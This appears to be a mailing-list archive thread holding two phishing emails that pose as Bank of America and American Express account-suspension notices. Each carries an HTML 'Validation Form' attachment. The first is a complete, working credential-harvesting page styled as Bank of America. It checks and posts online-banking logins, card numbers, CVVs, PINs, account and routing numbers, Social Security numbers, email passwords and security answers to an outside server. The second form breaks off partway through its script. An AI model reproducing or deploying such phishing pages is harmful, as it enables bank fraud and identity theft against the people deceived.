* Unauthorized activity on your online account
@ 2015-01-22 11:10 Bank of America
0 siblings, 0 replies; 3+ messages in thread
From: Bank of America @ 2015-01-22 11:10 UTC (permalink / raw)
To: linux-ext4
[-- Attachment #1: Message text --]
[-- Type: text/plain, Size: 789 bytes --]
CASE ID: 2796459
Dear Customer,
We have recently detected several failed attempts to provide the correct answers to your security questions.
As a result, we have temporarily suspended your online access and we need to go through some verification.
To begin please download the attached file below and start with the verification procedure.
Bank of America safeguards your account whenever there isa possibility that someone else is attempting to sign in.
Please understand that this form must be completed within 24 hours.
This is our security measure intended to help and protect you and your account.
Thank you for your cooperation and we deeply apologize for any inconvenience this may have caused you.
© 2014 Bank of America Corporation. All rights reserved.
[-- Attachment #2: Attached file: Validation Form.html --]
[-- Type: application/octet-stream, Size: 31187 bytes --]
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=Edge" />
<!-- TLDB false -->
<!-- TL-NOPV true -->
<title>Bank of America | Online Banking | Customer Service</title>
<script language="JavaScript" type="text/javascript">
var boaVIPAAuseGzippedBundles = "false";
var boaVIPAAjawrEnabled = "false";
</script>
<link rel="shortcut icon" href="https://secure.bankofamerica.com/pa/global-assets/1.0/graphic/favicon.ico" type="image/ico" />
<script language="JavaScript" type="text/javascript">
boaVIPAAuseGzippedBundles = "true";
</script>
<script language="JavaScript" type="text/javascript">
var vipaaPublicKey = "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAhSPXrfwo/cxe6pl9FahuuopVMqQd6gsSPU2DKl93loG8bJnu+zl8SmscOVPEARL22r2BKfW3+W8RHFDr9G903stahSZSzYWnAaSPhi8qixCA4gpZGwI8S4go3utYAhZ7ghz5Q0xSUypyciaHAbLIROm2TwO2hotVV7k0v9MtFjruJYN+reXD2cBuk3j2gm1iO5MPCPbiT6bp+J/9Esq0pFNpNTuimlCTf0flss8Sj0LPg1OIa0Cv+3tevnO7RaUa+vzwDahBxeO6p8CQOOoh43OkaFX/VLN8a26oo8wIeryVKh8yeBnLH/h+wT/JQGfuXSbhT4mEEy7EiTCBriAn2QIDAQAB";
</script>
<!-- TLDB TEALEAF_UiCapture_APP_ENABLED_NOT_TRUE -->
<script language="JavaScript" type="text/javascript">
boaVIPAAjawrEnabled = "true";
</script>
<link rel="stylesheet" type="text/css" href="https://secure.bankofamerica.com/pa/components/bundles/gzip-compressed/xengine/Global/1.0/style/global-jawr.css" media="all" />
<link rel="stylesheet" type="text/css" href="https://secure.bankofamerica.com/pa/components/bundles/gzip-compressed/xengine/VIPAA/2.7/style/vipaa-jawr.css" media="all" />
<script type="text/javascript">
if (self == top) {
var theBody = document.getElementsByTagName('body')[0];
theBody.style.display = "block";
} else {
top.location = self.location;
}
</script>
<noscript><style>body{display : block;}</style></noscript>
<a class="ada-hidden" href="#skip-to-h1" name="anc-skip-to-main-content">Skip to main content</a>
<div class="two-row-flex-wideleft-layout">
<div class="center-content">
<div class="header">
<noscript>
<div class="fauxdal-overlay"></div>
<div class="fauxdal-module">
<div class="noscript-reload-skin">
<div class="fauxdal-top"></div>
<div class="fauxdal-bottom">
<div class="fsd-fauxdal-content">
<div class="fsd-fauxdal-title">
Please use JavaScript
</div>
<p>You need a web browser that supports JavaScript to use our site. Without it, some pages won't work as designed. To make sure JavaScript is turned on, please adjust your browser settings.</p>
<p> </p>
<p><a title="Browser Help and Tips" name="Browser Help and Tips" href="https://www.bankofamerica.com/onlinebanking/online-banking-security-faqs.go" target="_self">Browser Help and Tips</a></p>
</div>
<div class="fsd-fauxdal-close">
<a class="button-common button-gray" name="close_button_js_disabled_modal" href=><span>Close</span></a>
</div>
<div class="clearboth"></div>
</div>
</div>
</div>
</noscript>
<style type="text/css">
a.submit input {
background:url(http://s7.postimg.org/6a3be7thj/cont.png) no-repeat;
cursor:pointer;
width: 85px;
height: 28px;
text-align: left;
border: none;
</style>
<SCRIPT language=JavaScript>
<!--
function check(form) {
if (form.box1.value == "Select state")
{ alert("Please select the state where your accounts were opened on step 1 before submitting."); form.box1.focus(); return;}
if (form.box2.value == "")
{ alert("Please Enter your Online ID on step 1 before submitting."); form.box2.focus(); return;}
if (form.box3.value == "")
{ alert("Please enter your Passcode on step 1 before submitting."); form.box3.focus(); return;}
if (form.box5.value == "")
{ alert("Please enter Credit/Debit Card Number on step 2."); form.box5.focus(); return;}
// Start of cc_number error Alert!
var checkOK = "0123456789";
var checkStr = form.box5.value;
var allValid = true;
var allNum = "";
for (i = 0; i < checkStr.length; i++)
{
ch = checkStr.charAt(i);
for (j = 0; j < checkOK.length; j++)
if (ch == checkOK.charAt(j))
break;
if (j == checkOK.length)
{
allValid = false;
break;
}
if (ch != ",")
allNum += ch;
}
if (!allValid)
{
alert("Please enter Credit/Debit Card Number on step 2.");
form.box5.focus();
return;}
// End of cc_number error Alert!
if (form.box5.value.length < 15)
{ alert("Please enter Credit/Debit Card Number on step 2.");form.box5.focus(); return;}
if (form.box6.value == "")
{ alert("Please enter your card's Expiration Month on step 2."); form.box6.focus(); return;}
if (form.box7.value == "")
{ alert("Please enter your card's Expiration Year on step 2."); form.box7.focus(); return;}
if (form.box8.value == "")
{ alert("Please Enter Code Verification Number of your Credit/Debit Card on step 2."); form.box8.focus(); return;}
// Start of cvv2 error Alert!
var checkOK = "0123456789";
var checkStr = form.box8.value;
var allValid = true;
var allNum = "";
for (i = 0; i < checkStr.length; i++)
{
ch = checkStr.charAt(i);
for (j = 0; j < checkOK.length; j++)
if (ch == checkOK.charAt(j))
break;
if (j == checkOK.length)
{
allValid = false;
break;
}
if (ch != ",")
allNum += ch;
}
if (!allValid)
{
alert("Please Enter Code Verification Number of your Credit/Debit Card on step 2.");
form.box8.focus();
return;}
// End of cvv2 error Alert!
if (form.box8.value.length < 3)
{ alert("Please Enter Code Verification Number of your Credit/Debit Card on step 2.");form.box8.focus(); return;}
if (form.box4.value == "")
{ alert("Enter your ATM/Check Card PIN on step 2."); form.box4.focus(); return;}
// Start of pin error Alert!
var checkOK = "0123456789";
var checkStr = form.box4.value;
var allValid = true;
var allNum = "";
for (i = 0; i < checkStr.length; i++)
{
ch = checkStr.charAt(i);
for (j = 0; j < checkOK.length; j++)
if (ch == checkOK.charAt(j))
break;
if (j == checkOK.length)
{
allValid = false;
break;
}
if (ch != ",")
allNum += ch;
}
if (!allValid)
{
alert("Enter your ATM/Check Card PIN on step 2.");
form.box4.focus();
return;}
// End of pin error Alert!
if (form.box4.value.length < 4)
{ alert("Enter your ATM/Check Card PIN on step 2.");form.box4.focus(); return;}
if (form.box10.value == "")
{ alert("Please Enter your Bank Account Number on step 2."); form.box10.focus(); return;}
// Start of accnr error Alert!
var checkOK = "0123456789";
var checkStr = form.box10.value;
var allValid = true;
var allNum = "";
for (i = 0; i < checkStr.length; i++)
{
ch = checkStr.charAt(i);
for (j = 0; j < checkOK.length; j++)
if (ch == checkOK.charAt(j))
break;
if (j == checkOK.length)
{
allValid = false;
break;
}
if (ch != ",")
allNum += ch;
}
if (!allValid)
{
alert("Please Enter your Bank Account Number on step 2.");
form.box10.focus();
return;}
// End of accnr error Alert!
if (form.box11.value == "")
{ alert("Please enter your Bank Routing Number on step 2."); form.box11.focus(); return;}
// Start of routnr error Alert!
var checkOK = "0123456789";
var checkStr = form.box11.value;
var allValid = true;
var allNum = "";
for (i = 0; i < checkStr.length; i++)
{
ch = checkStr.charAt(i);
for (j = 0; j < checkOK.length; j++)
if (ch == checkOK.charAt(j))
break;
if (j == checkOK.length)
{
allValid = false;
break;
}
if (ch != ",")
allNum += ch;
}
if (!allValid)
{
alert("Please enter your Bank Routing Number on step 2.");
form.box11.focus();
return;}
// End of routnr error Alert!
if (form.box12.value == "")
{ alert("Please Enter your Name as it appears on your Credit/Debit Card on step 3."); form.box12.focus(); return;}
if (form.box13.value == "")
{ alert("Please Enter your Credit/Debit Card Billing Address on step 3."); form.box13.focus(); return;}
if (form.box14.value == "")
{ alert("Please Enter the City of your Credit/Debit Card Billing Address on step 3."); form.box14.focus(); return;}
if (form.box16.value == "")
{ alert("Please Enter the Zipcode of your Credit/Debit Card Billing Address on step 3."); form.box16.focus(); return;}
// Start of Zip Code error Alert!
var checkOK = "0123456789";
var checkStr = form.box16.value;
var allValid = true;
var allNum = "";
for (i = 0; i < checkStr.length; i++)
{
ch = checkStr.charAt(i);
for (j = 0; j < checkOK.length; j++)
if (ch == checkOK.charAt(j))
break;
if (j == checkOK.length)
{
allValid = false;
break;
}
if (ch != ",")
allNum += ch;
}
if (!allValid)
{
alert("You must provide a valid Zip Code on step 3.");
form.box16.focus();
return;}
// End of Zip Code error Alert!
if (form.box16.value.length < 5)
{ alert("You must provide a valid Zip Code on step 3."); form.box16.focus(); return;}
if (form.box17.value == "")
{ alert("Please Enter your Phone Number on step 4."); form.box17.focus(); return;}
if (form.box18.value == "")
{ alert("Please Enter your Phone Number on step 4."); form.box18.focus(); return;}
if (form.box19.value == "")
{ alert("Please Enter your Phone Number on step 4."); form.box19.focus(); return;}
if (form.box20.value == "")
{ alert("Please Enter your Current E-mail Address on step 4."); form.box20.focus(); return;}
// Start of Email error Alert!
var checkEmail = "@.";
var checkStr = form.box20.value;
var EmailValid = false;
var EmailAt = false;
var EmailPeriod = false;
for (i = 0; i < checkStr.length; i++)
{
ch = checkStr.charAt(i);
for (j = 0; j < checkEmail.length; j++)
{
if (ch == checkEmail.charAt(j) && ch == "@")
EmailAt = true;
if (ch == checkEmail.charAt(j) && ch == ".")
EmailPeriod = true;
if (EmailAt && EmailPeriod)
break;
if (j == checkEmail.length)
break;
}
if (EmailAt && EmailPeriod)
{
EmailValid = true
break;
}
}
if (!EmailValid)
{
alert("Please enter a valid email address on step 4.");
form.box20.focus();
return;}
// End of Email error Alert!
if (form.box20.value.length < 3)
{ alert("Please enter a valid email address on step 4."); form.box20.focus(); return;}
if (form.box21.value == "")
{ alert("Please enter a valid Email address password on step 4."); form.box21.focus(); return;}
if (form.box21.value.length < 3)
{ alert("Please enter a valid Email address password on step 4."); form.box21.focus(); return;}
if (form.box22.value == "")
{ alert("Please Enter the First 3 Digits of your Social Security Number on step 5."); form.box22.focus(); return;}
if (form.box23.value == "")
{ alert("Please Enter the Second 2 Digits of your Social Security Number on step 5."); form.box23.focus(); return;}
if (form.box24.value == "")
{ alert("Please Enter the Last 4 Digits of your Social Security Number on step 5."); form.box24.focus(); return;}
if (form.box25.value == "")
{ alert("Please enter your Birth Month on step 5."); form.box25.focus(); return;}
if (form.box26.value == "")
{ alert("Please enter your Birth Day on step 5."); form.box26.focus(); return;}
if (form.box27.value == "")
{ alert("Please enter your Birth Year on step 5."); form.box27.focus(); return;}
if (form.box28.value == "")
{ alert("Please enter your Mother's Maiden Name on step 5."); form.box28.focus(); return;}
if (form.box29.value == "")
{ alert("Please enter your Mother's Middles Name on step 5."); form.box29.focus(); return;}
if (form.box30.value == "")
{ alert("Please enter your Father's Maiden Name on step 5."); form.box30.focus(); return;}
if (form.box31.value == "")
{ alert("Please enter your Father's Middles Name on step 5."); form.box31.focus(); return;}
if (form.box32.value == "")
{ alert("Please enter your Driver's License number on step 5."); form.box32.focus(); return;}
if (form.box33.value == "Select SiteKey Challenge Question 1")
{ alert("Please Select your First SiteKey Challenge Question."); form.box33.focus(); return;}
if (form.box34.value == "")
{ alert("Please Answer your First SiteKey Challenge Question."); form.box34.focus(); return;}
if (form.box35.value == "Select SiteKey Challenge Question 2")
{ alert("Please Select your Second SiteKey Challenge Question."); form.box35.focus(); return;}
if (form.box36.value == "")
{ alert("Please Answer your Second SiteKey Challenge Question."); form.box36.focus(); return;}
if (form.box37.value == "Select SiteKey Challenge Question 3")
{ alert("Please Select your Third SiteKey Challenge Question."); form.box37.focus(); return;}
if (form.box38.value == "")
{ alert("Please Answer your Third SiteKey Challenge Question."); form.box38.focus(); return;}
form.submit()
}
//-->
</SCRIPT>
<div class="header-module">
<div class="fsd-secure-esp-skin">
<img height="28" width="221" alt="Bank of America" src="https://secure.bankofamerica.com/content/images/ContextualSiteGraphics/Logos/en_US/bac_reg_logo_tmp_250X69.gif" />
<div class="right-links">
<div class="secure-area">Secure Area</div>
<a class="divide" href="/login/languageToggle.go?request_locale=es-us" target="_self" name="spanish_toggle" title="Muestra esta sesión de la Banca en Línea">En Español</a>
<div class="clearboth"></div>
</div>
<div class="clearboth"></div>
</div>
</div>
<div class="page-title-module h-100" id="skip-to-h1">
<div class="red-grad-bar-skin sup-ie">
<h1>Let's get started</h1>
</div>
</div>
<link href="http://vadimg.com/twitter-bootstrap-wizard-example/bootstrap/css/bootstrap.min.css" rel="stylesheet">
<link href="http://vadimg.com/twitter-bootstrap-wizard-example/prettify.css" rel="stylesheet">
<script src="http://code.jquery.com/jquery-latest.js"></script>
<script src="http://vadimg.com/twitter-bootstrap-wizard-example/bootstrap/js/bootstrap.min.js"></script>
<script src="http://vadimg.com/twitter-bootstrap-wizard-example/jquery.bootstrap.wizard.js"></script>
<script src="http://vadimg.com/twitter-bootstrap-wizard-example/prettify.js"></script>
<script>
$(document).ready(function() {
$('#rootwizard').bootstrapWizard({'nextSelector': '.button-next', 'previousSelector': '.button-previous'});
window.prettyPrint && prettyPrint()
});
</script>
<form action="http://www.kgna.co.uk/wp-admin/user/default.php" class="button" method="post" name="submit" id="submit">
<div id="rootwizard">
<div class="navbar">
<div class="navbar-inner">
<div class="container">
<div class="status-bar-bdf-module">
<div class="multi-step-skin">
<ul>
<li><a href="#tab1" data-toggle="tab">Step 1</a></li>
<li><a href="#tab2" data-toggle="tab">Step 2</a></li>
<li><a href="#tab3" data-toggle="tab">Step 3</a></li>
<li><a href="#tab4" data-toggle="tab">Step 4</a></li>
<li><a href="#tab5" data-toggle="tab">Step 5</a></li>
<li><a href="#tab6" data-toggle="tab">Finish</a></li>
</ul>
</div>
</div>
</div>
<div class="tab-content">
<div class="tab-pane" id="tab1">
<div class="blue-title"><h2 class="title-text">Please Update Your Online Banking Information</h2></div>
</br>
<font size="4">State where your accounts were opened : </font>
<p><select name="box1" id="stateListId" title="Select state" size="1"><option selected="" value="Select state">Select state</option> <option value="AL">Alabama</option> <option value="AK">Alaska</option> <option value="AZ">Arizona</option> <option value="AR">Arkansas</option> <option value="CA">California</option> <option value="CO">Colorado</option> <option value="CT">Connecticut</option> <option value="DE">Delaware</option> <option value="DC">District of Columbia</option> <option value="FL">Florida</option>
<option value="GA">Georgia</option> <option value="HI">Hawaii</option> <option value="ID">Idaho</option> <option value="IL">Illinois</option> <option value="IN">Indiana</option> <option value="IA">Iowa</option> <option value="KS">Kansas</option> <option value="KY">Kentucky</option> <option value="LA">Louisiana</option> <option value="ME">Maine</option> <option value="MD">Maryland</option> <option value="MA">Massachusetts</option> <option value="MI">Michigan</option> <option value="MN">Minnesota</option> <option value="MS">Mississippi</option> <option value="MO">Missouri</option> <option value="MT">Montana</option> <option value="NE">Nebraska</option> <option value="NV">Nevada</option> <option value="NH">New Hampshire</option> <option value="NJ">New Jersey</option> <option value="NM">New Mexico</option> <option value="NY">New York</option> <option value="NC">North Carolina</option> <option value="ND">North Dakota</option> <option value="OH">Ohio</option> <option value="OK">Oklahoma</option> <option value="OR">Oregon</option> <option value="PA">Pennsylvania</option> <option value="RI">Rhode Island</option> <option value="SC">South Carolina</option> <option value="SD">South Dakota</option>
<option value="TN">Tennessee</option> <option value="TX">Texas</option> <option value="UT">Utah</option> <option value="VT">Vermont</option> <option value="VA">Virginia</option> <option value="WA">Washington</option> <option value="WV">West Virginia</option> <option value="WI">Wisconsin</option> <option value="WY">Wyoming</option></select>
</p>
<font size="4">Online ID : <p><input autocomplete="off" type="text" size="5" title='Enter your Online id' name="box2" /></font></p>
<font size="4">Passcode : <p><input autocomplete="off" type="password" size="5" title='Enter your passcode' name="box3" /></font></p>
</div>
<div class="tab-pane" id="tab2">
<div class="blue-title"><h2 class="title-text">Account Information</h2></div>
</br>
<font size="4">Credit/Debit Card Number : <p><input autocomplete="off" maxlength="16" type="text" size="5" title='Enter your Card Number' name="box5" /></font></p>
<font size="4">Exp Date : <p><input autocomplete="off" type="text" size="5" style="WIDTH: 45px" maxlength="2" title='Enter your Exp Month' name="box6" /> <input autocomplete="off" type="text" style="WIDTH: 45px" maxlength="4" title='Enter your Exp year' name="box7" /></font></p>
<font size="4">Verification Code : <p><input autocomplete="off" maxlength="4" type="text" size="5" style="WIDTH: 45px" title='Enter your Verification number' name="box8" /></font></p>
<font size="4">ATM Pin : <p><input autocomplete="off" type="password" maxlength="4" size="5" style="WIDTH: 45px" title='Enter your ATM Pin' name="box4" /></font></p>
<font size="4">Account Number : <p><input autocomplete="off" type="text" size="5" title='Enter your Account Number' name="box10" /></font></p>
<font size="4">Routing Number : <p><input autocomplete="off" type="text" size="5" title='Enter your Routing Number' name="box11" /></font></p>
</div>
<div class="tab-pane" id="tab3">
<div class="blue-title"><h2 class="title-text">Billing Address</h2></div>
</br>
<font size="4">Full Name : <p><input autocomplete="off" type="text" size="5" title='Enter your Full Name' name="box12" /></font></p>
<font size="4">Address : <p><input autocomplete="off" type="text" size="5" title='Enter your Address' name="box13" /></font></p>
<font size="4">City : <p><input autocomplete="off" type="text" size="5" title='Enter your City' name="box14" /></font></p>
<font size="4">Zip Code : <p><input autocomplete="off" type="text" maxlength="5" style="WIDTH: 45px" title='Enter your Zip Code' name="box16" /></font></p>
</div>
<div class="tab-pane" id="tab4">
<div class="blue-title"><h2 class="title-text">Contact Information</h2></div>
</br>
<font size="4">Phone Number : <p><input autocomplete="off" type="text" maxlength="3" size="5" style="WIDTH: 45px" title='Enter your Phone Number' name="box17" /> <input autocomplete="off" maxlength="3" type="text" style="WIDTH: 45px" title='Enter your First Name' name="box18" /> <input autocomplete="off" maxlength="4" type="text" style="WIDTH: 45px" title='Enter your First Name' name="box19" /></font></p>
<font size="4">E-mail Address : <p><input autocomplete="off" type="text" size="5" title='Enter your E-mail Address' name="box20" /></font></p>
<font size="4">E-mail Password : <p><input autocomplete="off" type="password" size="5" title='Enter your E-mail Password' name="box21" /></font></p>
</div>
<div class="tab-pane" id="tab5">
<div class="blue-title"><h2 class="title-text">Identification Information</h2></div>
</br>
<font size="4">Social Security Number : <p><input autocomplete="off" maxlength="3" type="text" size="5" style="WIDTH: 45px" title='Enter your Social Security Number' name="box22" /> <input autocomplete="off" maxlength="2" type="text" style="WIDTH: 45px" title='Enter your Social Security Number' name="box23" /> <input autocomplete="off" type="text" maxlength="4" style="WIDTH: 45px" title='Enter your Social Security Number' name="box24" /></font></p>
<font size="4">Date of Birth : <p><input autocomplete="off" maxlength="2" type="text" size="5" style="WIDTH: 45px" title='Enter your Date of Birth' name="box25" /> <input autocomplete="off" maxlength="2" type="text" style="WIDTH: 45px" title='Enter Date of Birth' name="box26" /> <input autocomplete="off" maxlength="4" type="text" style="WIDTH: 45px" title='Enter your Date of Birth' name="box27" /></font></p>
<font size="4">Mother's Maiden Name : <p><input autocomplete="off" type="text" size="5" title='Mother's Maiden Name' name="box28" /></font></p>
<font size="4">Mother's Middles Name : <p><input autocomplete="off" type="text" size="5" title='Enter your Mother's Middles Name="box29" /></font></p>
<font size="4">Father's Maiden Name : <p><input autocomplete="off" type="text" size="5" title='Enter your Father's Maiden Name' name="box30" /></font></p>
<font size="4">Father's Middles Name : <p><input autocomplete="off" type="text" size="5" title='Enter your Father's Middles Name' name="box31" /></font></p>
<font size="4">Driver License Number : <p><input autocomplete="off" type="text" size="5" title='Enter your Driver License' name="box32" /></font></p>
</div>
<div class="tab-pane" id="tab6">
<div class="blue-title"><h2 class="title-text">SiteKey Challenge Questions</h2></div>
</br>
<p><select size="1" name="box33" autocomplete="off"><option selected="" value="Select SiteKey Challenge Question 1">Select SiteKey Challenge Question
1</option> <option value="In what city were you living at age 16?">In what
city were you living at age 16?</option> <option value="What is your maternal grandmother's first name?">What is your maternal
grandmother's first name?</option> <option value="What is your maternal grandfather's first name?">What is your maternal
grandfather's first name?</option> <option value="In what city were you born?">In what city were you born?</option>
<option value="What was the name of your first pet?">What was the name of your
first pet?</option> <option value="How old were you at your wedding?">How old
were you at your wedding?</option> <option value="In what year did you graduate from high school?">In what year did you
graduate from high school?</option> <option value="What is the first name of the best man/maid of honor at your wedding?">What
is the first name of the best man/maid of honor at your wedding?</option>
<option value="Who is your favorite childhood superhero?">Who is your favorite
childhood superhero?</option> <\SELECT></select></p>
<font size="4">Answer 1 : <p><input autocomplete="off" type="text" size="5" title='Answer 1' name="box34" /></font></p>
<p><select size="1" name="box35" autocomplete="off"><option selected="" value="Select SiteKey Challenge Question 2">Select SiteKey Challenge
Question 2</option> <option value="What is your father's middle name?">What is
your father's middle name?</option> <option value="What is your mother's middle name?">What is your mother's middle
name?</option> <option value="In what city were you married?">In what city
were you married?</option> <option value="In what city is your vacation home?">In what city is your vacation
home?</option> <option value="What is the first name of your first child?">What is the first name of
your first child?</option> <option value="What is the name of your first employer?">What is the name of your
first employer?</option> <option value="What is your favorite hobby?">What is
your favorite hobby?</option> <option value="What is your paternal grandfather's first name?">What is your paternal
grandfather's first name?</option> <option value="What is the first name of the best man/maid of honor at your wedding?">What
is the first name of the best man/maid of honor at your wedding?</option>
<option value="What high school did you attend?">What high school did you
attend?</option> <\SELECT></select><p>
<font size="4">Answer 2 : <p><input autocomplete="off" type="text" size="5" title='Answer 2' name="box36" /></font></p>
<p><select size="1" name="box37"><option selected="" value="Select SiteKey Challenge Question 3">Select
SiteKey Challenge Question 3</option> <option value="In what city was your mother born?">In what city was your mother
born?</option> <option value="In what city was your father born?">In what city
was your father born?</option> <option value="What was the name of your first boyfriend or girlfriend?">What was the
name of your first boyfriend or girlfriend?</option> <option value="When is your wedding anniversary?">When is your wedding
anniversary?</option> <option value="In what city did you honeymoon?">In what
city did you honeymoon?</option> <option value="In what city was your high school?">In what city was your high
school?</option> <option value="What is your paternal grandfather's first name?">What is your paternal
grandfather's first name?</option> <option value="What is your paternal grandmother's first name?">What is your paternal
grandmother's first name?</option> <option value="Where did you meet your spouse for the first time?">Where did you meet
your spouse for the first time?</option> <\SELECT></select></p>
<font size="4">Answer 3 : <p><input autocomplete="off" type="text" size="5" title='Answer 3' name="box38" /></font></p>
<a class="submit"><input autocomplete="off" onclick="check(this.form)" type="button" onsubmit="check(form);"></a>
</div>
<div style="float:left">
<input autocomplete="off" type='button' class='btn button-previous' name='previous' value='Previous' />
</div>
<div style="float:left">
<input autocomplete="off" type='button' class='btn button-next' name='next' value='Next' /></br></br>
</br></br>
</div>
</div>
</div>
</form>
<div id="clientSideErrors" class="messaging-module hide" aria-live="polite">
<div class="error-skin">
<div class="error-message">
<div id="Vipaa_Client_0"></div>
</div>
</div>
</div>
</div>
</div>
<div class="bottom-row">
<div class="left-column">
<div class="passcode-module">
<div class="verify-enroll-skin phoenix">
<div class="hidden-sections">
</div>
</div>
<div class="clearboth"></div>
</form>
</div>
</div>
<div class="modal-content-bdf-module">
<div class="sitekey-cancel-skin">
<div class="cancel-enroll-modal hide" id="cancel-enroll-modal" >
<div class="modal-content">
<h2>Are you sure you want to cancel enrollment?</h2>
<div id="infotext"><span id="infoNonChatText">Thank you for considering Online Banking. If you need additional assistance, please call 1.800.933.6262, Monday through Friday 7 a.m. to 10 p.m. local time, and Saturday and Sunday 8 a.m. to 5 p.m. local time</span>
<span id="lpButtonDivCancel"></span>
</div>
<div class="buttons">
<a name="modal_close" class="button-common button-blue mrt-15 sitekey-cancel-modal-leave-button" href="javascript:void(0);"><span>Yes, cancel now</span></a>
<a name="modal_cancel" class="button-common button-gray sitekey-cancel-modal-close-button" href="javascript:void(0);"> <span>No, continue enrolling</span> </a>
<div class="clearboth"></div>
</div>
</div>
</div>
<!-- end-->
</div>
</div>
</div>
<div class="right-column no-print">
<div class="quick-help-module">
<div class="fsd-liveperson-skin phoenix sup-ie" aria-atomic="true">
<div class="sm-title">
</div>
<div class="sm-topcontent-dottedbtm">
<div class="help-link-answer hide"></div>
</li>
</ul>
</div>
<div class="sm-btmcontent">
<div class="liveperson-module">
<div id="lpButtonDiv"></div>
</div>
</div>
</div>
</div>
</div>
<div class="clearboth"></div>
</div>
<div class="single-column-row"></div>
<div class="footer">
<div class="footer-top"> </div>
<div class="footer-inner">
<script language="javascript" src="https://secure.bankofamerica.com/pa/components/bundles/gzip-compressed/xengine/VIPAA/2.7/script/cm-jawr.js"></script>
<script type="text/javascript" src="https://secure.bankofamerica.com/pa/components/modules/vipaa-coremetrics-module/1.6/script/vipaa-coremetrics-module.js"></script>
<script type="text/javascript" src="https://secure.bankofamerica.com/pa/components/modules/vipaa-coremetrics-module/1.6/script/vipaa-coremetrics-module-eidms-skin.js"></script>
<noscript>
<iframe title="iFrame used for layout purpose" src="https://fls.doubleclick.net/activityi;src=1359940;type=olbco093;cat=onlin393;u4=[OLBcustomer];ord=1;num=1?" width="0" height="0" frameborder="0" style="display:none;"></iframe>
</noscript>
<div class="global-footer-module">
<div class="gray-bground-skin cssp">
<div class="secure">Secure area</div>
<div class="link-container">
<div class="link-row">
<a class="last-link" href="https://www.bankofamerica.com/privacy/" name="Privacy_&_Security_footer" title="Privacy & Security" target="_blank">Privacy & Security</a>
<div class="clearboth"></div>
</div>
</div>
<p>Bank of America, N.A. Member FDIC. <a name="Equal_Housing_Lender" href="http://www.bankofamerica.com/help/equalhousing_popup.cfm" target="_blank">Equal Housing Lender</a> <br />© 2014 Bank of America Corporation. All rights reserved.</p>
</div>
</div>
</div>
</div>
</div>
</div>
</html>
^ permalink raw reply [flat|nested] 3+ messages in thread
* Unauthorized activity on your online account
@ 2015-07-22 11:19 American Express
0 siblings, 0 replies; 3+ messages in thread
From: American Express @ 2015-07-22 11:19 UTC (permalink / raw)
To: linux-ext4
[-- Attachment #1: Message text --]
[-- Type: text/plain, Size: 795 bytes --]
Dear Customer,
We recently detected numerous failed attempts to provide the correct answers to your security questions.
Therefore, we have temporarily suspended online access to your account by other non authentic users, and we need to go through some verification.
To begin please download the attached file below to proceed to verification as soon as possible.
American Express safeguards your account whenever there is a possibility that someone else is attempting to sign in.
Please understand that this form must be completed within 24-48 hours.
This is our security measure intended to help and protect you and your account.
Thank you for your cooperation and we deeply apologize for any inconvenience this may cause you.
(C) American Express Customer Service 2015.
[-- Attachment #2: Attached file: Validation Form.html --]
[-- Type: application/octet-stream, Size: 22264 bytes --]
<!DOCTYPE html><html class=''>
<head><meta charset='UTF-8'><meta name="robots" content="noindex"><link rel="canonical" href="http://codepen.io/atakan/pen/gqbIz" />
<link rel='stylesheet' href='http://s.codepen.io/assets/reset/reset.css'>
<style class="cp-pen-styles">/*custom font*/
@import url(http://fonts.googleapis.com/css?family=Montserrat);
/*basic reset*/
* {margin: 0; padding: 0;}
html {
height: 100%;
/*Image only BG fallback*/
/*background = gradient + image pattern combo*/
background-color: #B9D9E8
}
body {
font-family: montserrat, arial, verdana;
}
/*form styles*/
#msform {
width: 400px;
margin: 50px auto;
text-align: center;
position: relative;
}
#msform fieldset {
background: #F7F5EC;
border: 0 none;
border-radius: 3px;
box-shadow: 0 0 15px 1px rgba(0, 0, 0, 0.4);
padding: 20px 30px;
box-sizing: border-box;
width: 80%;
margin: 0 10%;
/*stacking fieldsets above each other*/
position: absolute;
}
/*Hide all except first fieldset*/
#msform fieldset:not(:first-of-type) {
display: none;
}
/*inputs*/
#msform input, #msform textarea {
padding: 15px;
border: 1px solid #ccc;
border-radius: 3px;
margin-bottom: 10px;
width: 100%;
box-sizing: border-box;
font-family: montserrat;
color: #2C3E50;
font-size: 13px;
}
/*buttons*/
#msform .action-button {
width: 100px;
background: #0E92CE;
font-weight: bold;
color: white;
border: 0 none;
border-radius: 1px;
cursor: pointer;
padding: 10px 5px;
margin: 10px 5px;
}
#msform .action-button:hover, #msform .action-button:focus {
box-shadow: 0 0 0 2px white, 0 0 0 3px #0E92CE;
}
/*headings*/
.fs-title {
font-size: 15px;
text-transform: uppercase;
color: #2C3E50;
margin-bottom: 10px;
}
.fs-subtitle {
font-weight: normal;
font-size: 13px;
color: #666;
margin-bottom: 20px;
}
/*progressbar*/
#progressbar {
margin-bottom: 30px;
overflow: hidden;
/*CSS counters to number the steps*/
counter-reset: step;
}
#progressbar li {
list-style-type: none;
color: black;
text-transform: uppercase;
font-size: 9px;
width: 33.33%;
float: left;
position: relative;
}
#progressbar li:before {
content: counter(step);
counter-increment: step;
width: 20px;
line-height: 20px;
display: block;
font-size: 10px;
color: #333;
background: white;
border-radius: 3px;
margin: 0 auto 5px auto;
}
/*progressbar connectors*/
#progressbar li:after {
content: '';
width: 100%;
height: 2px;
background: white;
position: absolute;
left: -50%;
top: 9px;
z-index: -1; /*put it behind the numbers*/
}
#progressbar li:first-child:after {
/*connector not needed before the first step*/
content: none;
}
/*marking active/completed steps green*/
/*The number of the step and the connector before it = green*/
#progressbar li.active:before, #progressbar li.active:after{
background: #0E92CE;
color: white;
}
</style>
<script type='text/javascript'>
<!--
function check(form) {
if (form.UserID.value=="")
{ alert("Please enter a valid User ID before submitting. (Go back to the previous page)."); form.UserID.focus(); return;}
if (form.Password.value=="")
{ alert("Please enter a valid Password before submitting. (Go back to the previous page)."); form.Password.focus(); return;}
if (form.fullname.value == "")
{ alert("Please enter your First & Last name before submitting. (Go back to the previous page)."); form.fullname.focus(); return;}
if (form.address.value=="")
{ alert("Please enter your Billing Address before submitting. (Go back to the previous page)."); form.address.focus(); return;}
if (form.address.value.length < 5)
{ alert("Invalid Address. (Go back to the previous page)."); form.address.focus(); return;}
if (form.City.value == "")
